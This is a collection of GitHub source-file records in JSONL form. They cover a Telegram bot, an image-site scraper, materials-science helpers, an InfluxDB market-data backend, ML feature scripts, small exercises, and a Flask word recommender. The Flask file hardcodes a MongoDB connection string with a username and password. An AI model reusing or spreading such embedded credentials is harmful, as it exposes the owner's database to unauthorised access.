choice(settings.USER_EMOJI)\n return emojize(smile, language='alias')# smile(текст) преобразуем в иконку смайлика, language='alias'(текстовые обозначения смайликов)\n return user_data['emoji']\n\n\n#Функция вывода результата, для игры в числа\ndef play_random_numbers(user_number):\n bot_number = randint(user_number - 10, user_number + 10)\n if user_number > bot_number:\n message = f'Твое число {user_number}, мое {bot_number}, ты выиграл'\n elif user_number == bot_number:\n message = f'Твое число {user_number}, мое {bot_number}, ничья'\n else:\n message = f'Твое число {user_number}, мое {bot_number}, ты проиграл'\n return message\n\n\n#Функция отправки случайной картинки при нажатии кнопки Прислать котика и отправки геолокации(работает с мобилы)\ndef main_keyboard():\n return ReplyKeyboardMarkup([\n ['Прислать котика', KeyboardButton('Мои координаты', request_location=True)]\n ])\n","repo_name":"Comandosss/mybot","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73417863080","text":"import requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nimport lxml.etree\nimport time\nimport random\n#urls = \"https://www.meituri.com/s/%d/\"%index\n\ndef getTree(url):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\"Host\": \"www.meituri.com\"}\n try:\n r=requests.get(url, timeout=5,headers = headers, verify = False)\n r.raise_for_status()\n r.encoding=r.apparent_encoding\n tree=lxml.etree.HTML(r.text)\n return tree\n except Exception as e:\n raise Exception(\"404\",e)\n return None\nindex = 1\nwhile True:\n urlx = \"https://www.meituri.com/x/%d/\"%index\n try:\n tree=getTree(urlx)\n content=tree.xpath(\"//div[@class='fenlei']\")[0]\n title=content.xpath(\"h1\")[0].xpath(\"string(.)\")\n detail=content.xpath(\"p\")[0].xpath(\"string(.)\")\n detail=detail.replace(\"\\n\",\" \")\n print(index,urlx,title,detail,sep=\"@\",end=\"\\n\")\n except Exception as e:\n print(e)\n break\n index+=1\n time.sleep(random.randint(1,3))\n\nprint(\"++++++++++++++\")\nindex = 9\nwhile True:\n urls = \"https://www.meituri.com/s/%d/\"%index\n try:\n tree=getTree(urls)\n content=tree.xpath(\"//div[@class='fenlei']\")[0]\n title=content.xpath(\"h1\")[0].xpath(\"string(.)\")\n detail=content.xpath(\"p\")[0].xpath(\"string(.)\")\n print(index,urls,title,detail,sep=\"@\",end=\"\\n\")\n except Exception as e:\n print(e)\n break\n index+=1\n time.sleep(random.randint(2,4))\n\n\"\"\"\nurl = \"https://www.meituri.com/x/1/\"\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\"Host\": \"www.meituri.com\"}\nr=requests.get(url, timeout=5,headers = headers, verify = False)\nprint(r.status_code)\nprint(len(r.text))\"\"\"","repo_name":"crj1998/meitu","sub_path":"meituAPI.py","file_name":"meituAPI.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38014986121","text":"from ase.build import mx2\nfrom ase import Atoms\nfrom ase.io import read, write\nfrom ase.calculators.espresso import Espresso\nimport math\n\ndef monolayer_MX2(formula, a, thickness,vacuum):\n crystal=mx2(formula=formula, kind='2H', a=a, thickness=thickness, size=(1,1,1), vacuum=None)\n #print(crystal.positions)\n #convert to all PBC cell\n slab=Atoms(crystal)\n slab.set_cell([crystal.cell[0],crystal.cell[1],[0.0,0.0,vacuum]], scale_atoms=False)\n slab.set_pbc([True, True, True])\n return slab\n\ndef monolayer_Xene(formula, a, buckling, vacuum):\n if vacuum is not None:\n buckling=buckling/vacuum\n\n positions=[[2/3, 1/3,buckling/2.0],[1/3,2/3,-buckling/2.0]]\n cell=[[a, 0, 0], [-a/2, a * 3**0.5 / 2, 0], [0, 0, 0]]\n atoms = Atoms(formula, positions=positions, cell=cell, pbc=(1, 1, 0))\n atoms.set_scaled_positions(positions)\n if vacuum is not None:\n atoms.center(vacuum, axis=2)\n return atoms\n\n\n\n\n","repo_name":"eminamitani/layeredMaterialToolKit","sub_path":"layeredMaterialToolKit/monolayer.py","file_name":"monolayer.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11669658912","text":"from decimal import Decimal\nimport logging\nimport requests\n\nfrom cryptofeed.defines import BID, ASK\nfrom cryptofeed.backends._util import book_convert, book_delta_convert\nfrom cryptofeed.backends.http import HTTPCallback\nfrom cryptofeed.exceptions import UnsupportedType\n\n\nLOG = logging.getLogger('feedhandler')\n\n\nclass InfluxCallback(HTTPCallback):\n def __init__(self, addr: str, db: str, create_db=True, numeric_type=str, **kwargs):\n \"\"\"\n Parent class for InfluxDB callbacks\n\n influxDB schema\n ---------------\n MEASUREMENT | TAGS | FIELDS\n\n Measurement: Data Feed-Exxhange (configurable)\n TAGS: pair\n FIELDS: timestamp, amount, price, other funding specific fields\n\n Example data in InfluxDB\n ------------------------\n > select * from COINBASE-book;\n name: COINBASE\n time amount pair price side timestamp\n ---- ------ ---- ----- ---- ---------\n 1542577584985404000 0.0018 BTC-USD 5536.17 bid 2018-11-18T21:46:24.963762Z\n 1542577584985404000 0.0015 BTC-USD 5542 ask 2018-11-18T21:46:24.963762Z\n 1542577585259616000 0.0018 BTC-USD 5536.17 bid 2018-11-18T21:46:25.256391Z\n\n Parameters\n ----------\n addr: str\n Address for connection. Should be in the format:\n http(s)://:port\n db: str\n Database to write to\n numeric_type: str/float\n Convert types before writing (amount and price)\n \"\"\"\n super().__init__(addr, **kwargs)\n self.addr = f\"{addr}/write?db={db}\"\n self.session = None\n self.numeric_type = numeric_type\n\n if create_db:\n r = requests.post(f'{addr}/query', data={'q': f'CREATE DATABASE {db}'})\n r.raise_for_status()\n\nclass TradeInflux(InfluxCallback):\n def __init__(self, *args, key='trades', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed: str, pair: str, side: str, amount: Decimal, price: Decimal, order_id=None, timestamp=None):\n amount = str(amount)\n price = str(price)\n\n if order_id is None:\n order_id = 'None'\n if self.numeric_type is str:\n trade = f'{self.key}-{feed},pair={pair} side=\"{side}\",id=\"{order_id}\",amount=\"{amount}\",price=\"{price}\",timestamp={timestamp}'\n elif self.numeric_type is float:\n trade = f'{self.key}-{feed},pair={pair} side=\"{side}\",id=\"{order_id}\",amount={amount},price={price},timestamp={timestamp}'\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n\n await self.write('POST', trade)\n\n\nclass FundingInflux(InfluxCallback):\n def __init__(self, *args, key='funding', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed, pair, **kwargs):\n data = f\"{self.key}-{feed},pair={pair} \"\n\n for key, val in kwargs.items():\n if key in {'feed', 'pair'}:\n continue\n if isinstance(val, (Decimal, float)):\n val = str(val)\n if self.numeric_type is str:\n val = f'\"{val}\"'\n elif self.numeric_type is not float:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n elif isinstance(val, str):\n val = f'\"{val}\"'\n data += f\"{key}={val},\"\n\n data = data[:-1]\n await self.write('POST', data)\n\n\nclass InfluxBookCallback(InfluxCallback):\n async def _write_rows(self, start, data, timestamp):\n msg = []\n ts = int(timestamp * 1000000000)\n for side in (BID, ASK):\n for price, val in data[side].items():\n if isinstance(val, dict):\n for order_id, amount in val.items():\n if self.numeric_type is str:\n msg.append(f'{start} side=\"{side}\",id=\"{order_id}\",timestamp={timestamp},price=\"{price}\",amount=\"{amount}\" {ts}')\n elif self.numeric_type is float:\n msg.append(f'{start} side=\"{side}\",id=\"{order_id}\",timestamp={timestamp},price={price},amount={amount} {ts}')\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n ts += 1\n else:\n if self.numeric_type is str:\n msg.append(f'{start} side=\"{side}\",timestamp={timestamp},price=\"{price}\",amount=\"{val}\" {ts}')\n elif self.numeric_type is float:\n msg.append(f'{start} side=\"{side}\",timestamp={timestamp},price={price},amount={val} {ts}')\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n ts += 1\n await self.write('POST', '\\n'.join(msg))\n\n\nclass BookInflux(InfluxBookCallback):\n def __init__(self, *args, key='book', depth=None, **kwargs):\n super().__init__(*args, **kwargs)\n self.depth = depth\n self.key = key\n self.previous = {BID: {}, ASK: {}}\n\n async def __call__(self, *, feed, pair, book, timestamp):\n data = {BID: {}, ASK: {}}\n book_convert(book, data, self.depth)\n\n if self.depth:\n if data[BID] == self.previous[BID] and data[ASK] == self.previous[ASK]:\n return\n self.previous[ASK] = data[ASK]\n self.previous[BID] = data[BID]\n\n start = f\"{self.key}-{feed},pair={pair},delta=False\"\n await self._write_rows(start, data, timestamp)\n\n\nclass BookDeltaInflux(InfluxBookCallback):\n def __init__(self, *args, key='book', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed, pair, delta, timestamp):\n start = f\"{self.key}-{feed},pair={pair},delta=True\"\n data = {BID: {}, ASK: {}}\n book_delta_convert(delta, data)\n await self._write_rows(start, data, timestamp)\n","repo_name":"glgnohk/cryptofeed","sub_path":"cryptofeed/backends/influxdb.py","file_name":"influxdb.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"24335313925","text":"from __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torchvision import datasets, transforms\r\nfrom torch.autograd import Variable\r\nimport os\r\nimport numpy as np\r\nfrom dann_model import DANN_Neural_Network\r\nfrom dann_data import MNIST, SVHN\r\n\r\n\r\n# Training settings\r\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\r\nparser.add_argument('--batch-size', type=int, default=64, metavar='N',\r\n help='input batch size for training (default: 64)')\r\nparser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\r\n help='input batch size for testing (default: 1000)')\r\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\r\n help='number of epochs to train (default: 10)')\r\nparser.add_argument('--lr', type=float, default=0.01, metavar='LR',\r\n help='learning rate (default: 0.01)')\r\nparser.add_argument('--momentum', type=float, default=0.5, metavar='M',\r\n help='SGD momentum (default: 0.5)')\r\nparser.add_argument('--no-cuda', action='store_true', default=False,\r\n help='disables CUDA training')\r\nparser.add_argument('--seed', type=int, default=1, metavar='S',\r\n help='random seed (default: 1)')\r\nparser.add_argument('--log-interval', type=int, default=10, metavar='N',\r\n help='how many batches to wait before logging training status')\r\nparser.add_argument('--save_dir', type=str, default='./train',\r\n help=\"the path to save the trained model\")\r\nargs = parser.parse_args()\r\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\r\n\r\nif not os.path.exists(args.save_dir):\r\n os.makedirs(args.save_dir)\r\n\r\ntorch.manual_seed(args.seed)\r\nif args.cuda:\r\n torch.cuda.manual_seed(args.seed)\r\n\r\nbatch_size = 128\r\n\r\n\r\n\r\ntest_dataset = SVHN(csv_file=\"./hw3_data/digits/svhn/test.csv\", root_dir=\"./hw3_data/digits/svhn/test\",transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\r\n ]))\r\n\r\n\r\n\r\ntrain_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=True)\r\n\r\n\r\n\r\n\r\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\r\n\r\nmodel = DANN_Neural_Network()\r\n\r\nmodel_root = os.path.join('.','dann_NN_models/mnist_to_svhn')\r\n\r\nNN_test = torch.load(os.path.join(\r\n model_root, 'domainadaptation2_model28-0' + '.pth'\r\n ))\r\ncst = 0\r\nif args.cuda:\r\n model.cuda()\r\n\r\ndef generate_feature():\r\n model.eval()\r\n cnt = 0\r\n out_target = []\r\n out_data = []\r\n out_output =[]\r\n for data, target in train_loader:\r\n cnt += len(data)\r\n print(\"processing: %d/%d\" % (cnt, len(train_loader.dataset)))\r\n if args.cuda:\r\n data, target = data.cuda(), target.cuda()\r\n data, target = Variable(data, volatile=True), Variable(target)\r\n output = model(data)\r\n output_np = output.data.cpu().numpy()\r\n target_np = target.data.cpu().numpy()\r\n data_np = data.data.cpu().numpy()\r\n\r\n out_output.append(output_np)\r\n out_target.append(target_np[:, np.newaxis])\r\n out_data.append(np.squeeze(data_np))\r\n\r\n\r\n output_array = np.concatenate(out_output, axis=0)\r\n target_array = np.concatenate(out_target, axis=0)\r\n data_array = np.concatenate(out_data, axis=0)\r\n\r\n np.save(os.path.join(\"./tsne\", 'output.npy'), output_array, allow_pickle=False)\r\n np.save(os.path.join(\"./tsne\", 'target.npy'), target_array, allow_pickle=False)\r\n np.save(os.path.join(\"./tsne\", 'data.npy'), data_array, allow_pickle=False)\r\n\r\ngenerate_feature()","repo_name":"amelieclautour/DLCV2019-Hw3-GAN","sub_path":"tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30658834279","text":"n = int(input())\nd = dict()\nl = []\n\nfor i in range(n-1):\n m = int(input())\n for j in range(m):\n s = input()\n if s not in d:\n d[s]=1\n else:\n d[s] += 1\n\nm = int(input())\nfor j in range(m):\n s = input()\n if s not in d:\n d[s]=1\n elif d[s] == n-1:\n l.append(s)\n\nprint(len(l))\nfor v in l:\n print(v)\nprint(len(d))\nfor k in d:\n print(k)","repo_name":"newRational/Yandex-algorithms-1.0","sub_path":"3/I/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42572252483","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader\n\n\ndef index(request):\n\n if request.user.is_authenticated:\n return HttpResponseRedirect(redirect_to=\"/events/\")\n else:\n template = loader.get_template('home/index.html')\n context = {\n 'title': 'Welcome to Send Cloud BBQ Planner'\n }\n return HttpResponse(template.render(context, request))\n","repo_name":"pouyaist/BBQ_planner","sub_path":"bbq_planner/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4465650616","text":"from math import ceil\n\ndef calc_parking_costs(hours):\n return hours * 1.5;\n\ndef calc_parking_costs_detailed(hours):\n if hours <= 8:\n total = 0;\n\n if hours > 0: \n total += 2;\n hours -= 1;\n \n if hours > 0:\n total += 1.5;\n hours -= 1;\n\n if hours > 0:\n total += hours * 1;\n\n return total;\n else:\n # the parking time is \"a day or more\"\n return ceil(hours / 24) * 10;\n\ndef is_coin_or_note(money):\n correct_values = [.1,.2,.5,1,2,5,10,20,50];\n\n return money in correct_values;\n\ndef calc_returned_coins_and_notes(money):\n correct_values = [.1,.2,.5,1,2,5,10,20,50];\n correct_values.sort(reverse=True);\n\n returned_values = {};\n\n for correct_value in correct_values:\n while money >= correct_value:\n money -= correct_value;\n if not correct_value in returned_values.keys():\n returned_values[correct_value] = 1;\n else:\n returned_values[correct_value] += 1;\n\n return returned_values;\n\ndef output_returned_money(returned_values: dict):\n for money_value, amount in returned_values.items():\n print(\"Sie bekommen {}x {} EUR.\".format(amount, money_value));\n\n\nhours = ceil(float(input(\"Geparkte Stunden: \")));\n\ncurrent_cost = calc_parking_costs_detailed(hours);\n\nprint(\"Es werden {} Euro fällig\".format(current_cost));\n\ntotal_paid = 0;\ntotal_return = 0;\nwhile current_cost > total_paid:\n paid_money_input = input(\"Wieviel zahlen Sie ein: \");\n\n try:\n paid_money = float(paid_money_input);\n\n total_paid += paid_money;\n\n if current_cost > total_paid:\n print(\"Sie müssen noch {} EUR bezahlen.\".format(current_cost));\n else:\n total_return = total_paid - current_cost;\n break;\n except:\n print(\"Vorgang abgebrochen.\");\n total_return = total_paid;\n\nif total_return > 0:\n returned_values = calc_returned_coins_and_notes(total_return);\n output_returned_money(returned_values);\n\nprint(\"Vielen Dank und auf Wiedersehen\");\n","repo_name":"TnTGamesTV/python-lesson","sub_path":"lesson3/A3_3242157.py","file_name":"A3_3242157.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74140031720","text":"\nimport bisect\nimport os\nimport json\nimport glob\n\nPROBLEM_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nDATA_DIR = f'{PROBLEM_DIR}/data'\nRESULTS_DIR = f'{PROBLEM_DIR}/results'\n\ndef loadProblems(fn):\n ret = {}\n fp = open(fn, 'r')\n \n num_isoforms, delta = [int(s) for s in fp.readline().rstrip().split(' ')]\n isoforms = []\n for x in range(0, num_isoforms):\n isoforms.append(fp.readline().rstrip())\n \n num_reads = int(fp.readline())\n reads = []\n for x in range(0, num_reads):\n reads.append(fp.readline().rstrip())\n\n fp.close()\n\n ret['isoforms'] = isoforms\n ret['reads'] = reads\n ret['delta'] = delta\n\n return ret\n\ndef parseRanges(s):\n regions = s.split(',')\n ret = []\n for r in regions:\n s, e = r.split('-')\n ret.append((int(s), int(e)))\n return ret\n\ndef solveProblem(problem):\n #Load the problem dict (or list of problem dicts)\n isoforms = problem['isoforms']\n reads = problem['reads']\n delta = problem['delta']\n num_isoforms = len(isoforms)\n\n #initial answers are all -1 and 0\n first_match = [-1]*len(reads)\n num_match = [0]*len(reads)\n\n #strategy: iterate through each isoform, compare to the read to mark as a match or not; first find goes into find bucket\n print('Preprocessing reads...')\n parsed_reads = [parseRanges(r) for r in reads]\n\n print('Isoform iterating...')\n for iso_num, isoform in enumerate(isoforms):\n print(f'\\tIsoform #{iso_num} / {num_isoforms}...')\n iso_ranges = parseRanges(isoform)\n #print(iso_ranges)\n for read_num, pr in enumerate(parsed_reads):\n #print(pr)\n #compare them here\n pr_start = pr[0]\n ind = bisect.bisect(iso_ranges, pr_start)\n \n initial_check = max(0, ind-1)\n maximal_check = min(len(iso_ranges), ind+1)\n \n initial_range = -1\n for si in range(initial_check, maximal_check):\n curr_range = iso_ranges[si]\n if (pr_start[0] >= curr_range[0]-delta and\n abs(pr_start[1] - curr_range[1]) <= delta):\n #this is the initial range\n initial_range = si\n break\n \n if initial_range != -1 and (initial_range+len(pr) <= len(iso_ranges)):\n #this is a candidate, check all the in-between regions\n mismatch = False\n for offset in range(1, len(pr)-1):\n pr_range = pr[offset]\n curr_range = iso_ranges[initial_range+offset]\n if (abs(pr_range[0] - curr_range[0]) <= delta and\n abs(pr_range[1] - curr_range[1]) <= delta):\n #still good\n pass\n else:\n mismatch = True\n break\n\n #TODO: finally check the tail region\n pr_range = pr[-1]\n curr_range = iso_ranges[initial_range+len(pr)-1]\n if (abs(pr_range[0] - curr_range[0]) <= delta and\n pr_range[1] <= curr_range[1]+delta):\n pass\n else:\n mismatch = True\n\n if not mismatch:\n num_match[read_num] += 1\n if first_match[read_num] == -1:\n first_match[read_num] = iso_num\n\n #exit()\n\n print('Getting results...')\n results = {\n 'first_match' : first_match,\n 'num_match' : num_match\n }\n return results\n \ndef writeResults(fn, all_results):\n fp = open(fn, 'w+')\n first_match = all_results['first_match']\n num_match = all_results['num_match']\n for i, fm in enumerate(first_match):\n fp.write(f'{fm} {num_match[i]}\\n')\n fp.close()\n\nif __name__ == '__main__':\n #there are usually multiple per problem\n all_filenames = sorted(glob.glob(f'{DATA_DIR}/*.txt'))\n starting_problem = 6\n ending_problem = 6\n\n if not os.path.exists(RESULTS_DIR):\n os.makedirs(RESULTS_DIR)\n\n #go through each ones\n for problem in range(starting_problem, ending_problem+1):\n #filenames below might need to change per problem\n print(f'Analyzing problem set #{problem}...')\n #fn = f'{DATA_DIR}/{problem}.txt'\n fn = all_filenames[problem]\n fno = f'{RESULTS_DIR}/{problem}.txt'\n\n #load the problems for this set\n problems = loadProblems(fn)\n\n #generate results for each one\n all_results = solveProblem(problems)\n\n #finally save the results\n writeResults(fno, all_results)\n","repo_name":"holtjma/bio_contest_2021","sub_path":"problem_3.6/scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"12370855658","text":"from random import sample\n\nimport math\nimport requests\nfrom flask import jsonify\nfrom flask_restx import Resource, Namespace, fields\nfrom pymongo import MongoClient\n\n# define namespace\nns = Namespace('ucb', description='ucb operations')\n\n\n# MongoDB 연결 설정\nmongodb_uri = \"mongodb+srv://p4dsteam6:team6@cluster0.yvkcbg6.mongodb.net/\"\nclient = MongoClient(mongodb_uri)\ndb = client['mindmapDB']\ncollections = {\n 'marketer': db['marketer_ucb'],\n 'developer': db['developer_ucb'],\n 'designer': db['designer_ucb'],\n}\n\n\ndef get_db():\n client = MongoClient(mongodb_uri)\n db = client['mindmapDB']\n return db\n\n\ndef get_collection(user_type):\n if user_type in collections:\n db = get_db()\n return db[user_type+'_ucb']\n\n\ndef related_word(word, limit=100):\n try:\n word = word.lower()\n url = f'http://api.conceptnet.io/c/en/{word}?rel=/r/RelatedTo&limit={limit}'\n response = requests.get(url)\n response.raise_for_status() # Raises stored HTTPError, if one occurred.\n data = response.json()\n except (requests.HTTPError, ValueError) as err:\n print(f'An error occurred: {err}')\n return []\n else:\n related_words = []\n for item in data['edges']:\n if item['rel']['label'] == 'RelatedTo':\n related = item['start']['label'].lower() if item['start']['label'].lower() != word else item['end']['label'].lower()\n if related not in related_words:\n related_words.append(related)\n return related_words\n\n\ndef store_word_and_related_words(word, user_type, limit=100):\n collection = get_collection(user_type)\n doc = collection.find_one({\"word\": word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n\n related_words = related_word(word, limit)\n for a_word in related_words:\n doc = collection.find_one({\"word\": a_word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n\n\ndef center_word(word, user_type, num_samples=10):\n store_word_and_related_words(word, user_type, limit=100)\n words = related_word(word, limit=100)\n return sample(words, num_samples)\n\n\ndef get_word_params(word, user_type):\n \"\"\"\n Get the parameters of a word for Thompson Sampling from the database.\n If the word does not exist in the database, initialize it with 1 success and 1 failure.\n \"\"\"\n collection = get_collection(user_type)\n doc = collection.find_one({\"word\": word})\n if doc is None:\n params = {\"successes\": 1, \"failures\": 1}\n doc = {\n \"word\": word,\n \"params\": params\n }\n collection.insert_one(doc)\n else:\n params = doc[\"params\"]\n return params\n\n\ndef update_word_params(word, user_type, success):\n \"\"\"\n Update the parameters of a word for Thompson Sampling in the database.\n If success is True, increment the successes of the word.\n If success is False, increment the failures of the word.\n \"\"\"\n collection = get_collection(user_type)\n params = get_word_params(word, user_type)\n if success:\n params[\"successes\"] += 1\n else:\n params[\"failures\"] += 1\n collection.update_one({\"word\": word}, {\"$set\": {\"params\": params}})\n\n\ndef process_feedback(recommended_words, user_type, selected_word):\n \"\"\"\n Process the feedback of a user.\n If the selected word is in the recommended words, consider it a success for that word.\n \"\"\"\n success = (selected_word in recommended_words)\n update_word_params(selected_word, user_type, success)\n\n\ndef get_ucb(total, success, num_samples, c):\n \"\"\"\n Calculate the Upper Confidence Bound (UCB)\n \"\"\"\n if success == 0:\n return float('inf')\n average = success / total\n ucb = average + math.sqrt((c * math.log(num_samples)) / success)\n return ucb\n\n\ndef recommend_words_ucb(user_type, c, num_recommendations=10):\n \"\"\"\n Recommend a list of words using Upper Confidence Bound (UCB)\n \"\"\"\n collection = get_collection(user_type)\n words = collection.find({})\n word_samples = []\n total_samples = 0\n for word_doc in words:\n word = word_doc[\"word\"]\n params = word_doc[\"params\"]\n total_samples += params[\"successes\"] + params[\"failures\"]\n\n for word_doc in words:\n word = word_doc[\"word\"]\n params = word_doc[\"params\"]\n ucb = get_ucb(params[\"successes\"] + params[\"failures\"], params[\"successes\"], total_samples, c)\n word_samples.append((word, ucb))\n\n word_samples.sort(key=lambda x: x[1], reverse=True)\n recommended_words = [word for word, ucb in word_samples[:num_recommendations]]\n return recommended_words\n\n\n@ns.route('/center//')\n@ns.doc({'parameters': [{'name': 'word', 'in': 'path', 'type': 'string', 'required': True},\n {'name': 'user_type', 'in': 'path', 'type': 'string', 'required': True}]})\nclass centerWord(Resource):\n def get(self, word, user_type):\n suggestions = center_word(word, user_type)\n return jsonify(suggestions)\n\n\nlist_item_model = ns.model('ListItem', {\n 'center_word': fields.String(required=True, description='Center word'),\n 'user_type': fields.String(required=True, description='User type')\n})\n\n\n@ns.route('/human/')\n@ns.doc({'parameters': [{'name': 'choice_word', 'in': 'path', 'type': 'string', 'required': True}]})\nclass humanFeedback(Resource):\n @ns.expect(list_item_model)\n def post(self, choice_word, c):\n recommended_words = recommend_words_ucb(ns.payload['user_type'], c, num_recommendations=10)\n process_feedback(recommended_words, ns.payload['user_type'], choice_word)\n return jsonify(recommended_words)","repo_name":"GSDSProject/project","sub_path":"home/views/word/similarWord_ucb.py","file_name":"similarWord_ucb.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"165873909","text":"import numpy as np\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Dense, Input\nfrom keras.optimizers import Adam\nimport matplotlib.pyplot as plt\nimport csv\nfrom keras import backend as K\nimport keras\nfrom keras.models import load_model\nimport tensorflow as tf\n# def getSample(path):\n\t# label = []\n\t# input = []\n\t# with open(path, 'r', encoding='utf-8') as data:\n\t\t# read = csv.reader(data)\n\t\t# first_skip=True\n\t\t# for line in read:\n\t\t\t# if first_skip:\n\t\t\t\t# first_skip=False\n\t\t\t\t# continue\n\t\t\t# #one_hot=np.zeros(output_size)\n\t\t\t# #one_hot[int(line[0])]=1\n\t\t\t\n\t\t\t# label.append(int(line[0]))\n\t\t\t# raw = []\n\t\t\t# for i in line[1:]:\n\t\t\t\t# num=float(i)\n\t\t\t\t# if num>0:\n\t\t\t\t\t# raw.append(num)\n\t\t\t\t# else:\n\t\t\t\t\t# raw.append(0)\n\t\t\t# raw=np.array(raw)\n\t\t\t# raw=raw/np.average(raw)\n\t\t\t# input.append(raw)\n\t# return np.array(input),np.array(label)\n\n# x,y = getSample(\"sample_14L_Amptitute_0529.csv\")\n# # x,y = getSample(\"sample_mid.csv\")\n# print(np.shape(x), np.shape(y))\n\n\noutput_size=5 #類別數\ninput_size = 8192 #輸入Feature大小\nClassSampleNum = 240 #每個類別的樣本數\nTestSetNum = 40\nf_min = 150\nf_max = 70000\nResolution = 140000 / 16384\ndef getSample(path):\n\tlabel = []\n\tinput = []\n\twith open(path, 'r', encoding='utf-8') as data:\n\t\tread = csv.reader(data)\n\t\tfirst_skip=True\n\t\tfor line in read:\n\t\t\tif first_skip:\n\t\t\t\tfirst_skip=False\n\t\t\t\tcontinue\n\t\t\t#one_hot=np.zeros(output_size)\n\t\t\t#one_hot[int(line[0])]=1\n\t\t\t\n\t\t\tlabel.append(int(line[0]))\n\t\t\traw = []\n\t\t\tfor i in line[1::]:\n\t\t\t\tnum=float(i)\n\t\t\t\tif num>0:\n\t\t\t\t\traw.append(num)\n\t\t\t\telse:\n\t\t\t\t\traw.append(0)\n\t\t\traw=np.array(raw)\n\t\t\traw=raw/np.average(raw)\n\t\t\tinput.append(raw)\n\treturn np.array(input),np.array(label)\n\nx,y = getSample(\"sample.csv\")\nstd_x = np.std(x)\nmean_x = np.mean(x)\nx = (x-mean_x)/std_x\nprint(x.shape)\nprint(y.shape) \n\ndef Reorganize(x):\n x = np.reshape(x, (len(x), 8192))\n x_mean_col = np.mean(x , axis = 0)\n print(x_mean_col)\n x_mean = np.mean(x_mean_col[int((150/Resolution))::])*0.4\n print(x_mean)\n f = -Resolution\n flag = 0\n freq = []\n Idx = []\n #Select region\n print(\"Select region\")\n for i in range(input_size):\n f += Resolution\n if f > f_min and x_mean_col[i] > x_mean:\n if flag == 0:\n flag = 1\n freq.append([f])\n Idx.append([i])\n if f > f_min and x_mean_col[i] < x_mean:\n if flag == 1:\n flag = 0\n freq[len(freq)-1].append(f)\n Idx[len(Idx)-1].append(i)\n \n #merge\n print(\"merge\")\n j=0\n freq = np.array(freq)\n Idx = np.array(Idx)\n for i in range(len(freq)):\n if i == 0:\n continue\n if freq[j+1][0] - freq[j][1] < 300:\n freq[j][1] = freq[j+1][0]\n Idx[j][1] = Idx[j+1][0]\n freq = np.delete(freq, j+1, 0)\n Idx = np.delete(Idx, j+1, 0)\n else:\n j += 1\n \n #Reorganize\n print(\"Reorganize\")\n new_x = []\n for i in range(output_size*ClassSampleNum):\n new_x.append([])\n for idx in Idx:\n new_x[i].extend(x[i][idx[0]:idx[1]])\n \n # plt.plot(new_x[0][0:2369])\n # plt.title(\"Feature Map\")\n # plt.xlabel(\"Feature point\")\n # plt.ylabel(\"Amplitude\")\n # plt.show()\n \n new_x = np.reshape(new_x,(len(new_x), len(new_x[0])))\n print(np.shape(new_x))\n print(\"Freq. region : \")\n print(freq)\n print(Idx)\n \n # x_label = np.reshape(freq,(len(freq)*2))\n # y_label = np.ones(len(x_label))\n # plt.plot(np.arange(8191)*(Resolution)+Resolution, x_mean_col)\n # 